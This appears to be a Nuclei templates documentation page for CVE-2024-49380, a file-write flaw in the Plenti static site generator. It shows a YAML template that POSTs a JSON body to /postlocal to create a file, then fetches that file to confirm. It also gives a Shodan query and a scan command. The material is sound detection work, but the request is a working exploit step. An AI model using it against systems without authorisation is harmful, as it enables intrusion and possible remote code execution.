Skip to content
Nuclei Templates

Plenti < v0.7.2 - OS Command Injection

ID: CVE-2024-49380

Severity: critical

Author: iamnoooob,rootxharsh,pdresearch

Tags: cve,cve2024,plenti,rce,injection,intrusive

Description

Section titled “Description”

Plenti, a static site generator, has an arbitrary file write vulnerability in versions prior to 0.7.2. The /postLocal endpoint is vulnerable to an arbitrary file write vulnerability when a plenti user serves their website. This issue may lead to Remote Code Execution. Version 0.7.2 fixes the vulnerability.

YAML Source

Section titled “YAML Source”
id: CVE-2024-49380


info:
  name: Plenti < v0.7.2 - OS Command Injection
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    Plenti, a static site generator, has an arbitrary file write vulnerability in versions prior to 0.7.2. The `/postLocal` endpoint is vulnerable to an arbitrary file write vulnerability when a plenti user serves their website. This issue may lead to Remote Code Execution. Version 0.7.2 fixes the vulnerability.
  reference:
    - https://securitylab.github.com/advisories/GHSL-2024-297_GHSL-2024-298_plenti/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-49380
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-49380
    cwe-id: CWE-78
    epss-score: 0.00046
    epss-percentile: 0.17681
  metadata:
    max-request: 2
    verified: true
    shodan-query: title:"Plenti"
  tags: cve,cve2024,plenti,rce,injection,intrusive


variables:
  filename: "{{rand_base(6)}}"


http:
  - raw:
      - |
        POST /postlocal HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json


        [{"Action": "create","Contents":"{{randstr}}","File": "static/{{filename}}.txt"}]


      - |
        GET /{{filename}}.txt?{{wait_for(5)}} HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "{{randstr}}")'
          - 'contains(header_2, "text/plain")'
          - 'status_code_2 == 200'
        condition: and
# digest: 4b0a0048304602210084f54770e09b1af141a062bf2af35b4a9ec33e88448b9557c96c5c7141a5d482022100dd370aca140349dbdcf224589f950c60c5b3d2b8d2878e1022bf735759c5dd8d:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-49380.yaml"

View on Github